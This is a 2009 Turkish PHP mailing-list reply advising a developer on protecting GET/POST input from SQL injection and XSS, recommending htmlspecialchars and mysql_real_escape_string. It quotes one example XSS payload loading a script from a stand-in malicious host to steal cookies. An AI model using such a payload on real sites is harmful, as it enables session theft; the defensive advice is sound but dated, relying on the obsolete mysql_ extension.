Merhaba,
SQL için diðer arkadaþlarýn tavsiyeleri sanýrým yeterli. Ancak ekrana
bastýrmaktan bahsettiðine göre xss içinde kendini koruman gerekir.
Misal;
http://www.site.com/?parametre=<script
src="http://www.zararli.com/xss.js"></script>
Gibi bir istekte xss.js dosyasýný browser execute eder ve cookiler
dahil browser tarafýnda js'nin yetkisi dahilinde tüm bilgiler
çalýnabilir ve iþlem yaptýrýlabilir. Mesela sayfanýn bir bölgesine
reklam bile eklenebilir.
Gelen parametreyi ekrana bastýracaðýn sýrada htmlspecialchars
fonksiyonu ile ekrana bastýrýrsan basitçe bundan korunmuþ olursun.
Örnek;
$par = mysql_real_escape_string($_GET['parametre']);
$sql = "SELECT * FROM table WHERE name='$par'";
echo(htmlspecialchars($par));
Kolay gelsin...
2009/1/11 Nuri AKMAN <nuriakman_at_gmail.com>:
> Arkadaþlar,
>
> $_POST veya $_GET ile aldýðým bir parametreyi SQL'de kullanmam ve ekrana
> yazdýrmam gerekiyor.
> Aþaðýdaki kadar iþlem hack yememek için sizce yeterli olur mu?
>
>
> $_GET['bolumadi'] = striptags($_GET['bolumadi']);
> echo $_GET['bolumadi'];
> $SQL = sprintf("select * from xxx where yyy = '%s' order by 1",
> mysql_real_escape_string( $_GET['bolumadi'] ));
>
> Selamlar,
> Nuri AKMAN
>
> _______________________________________________
> Linux-programlama mailing list
> Linux-programlama_at_liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-programlama
>
>
_______________________________________________
Linux-programlama mailing list
Linux-programlama_at_liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-programlama
Received on Wed 14 Jan 2009 - 07:27:29 EET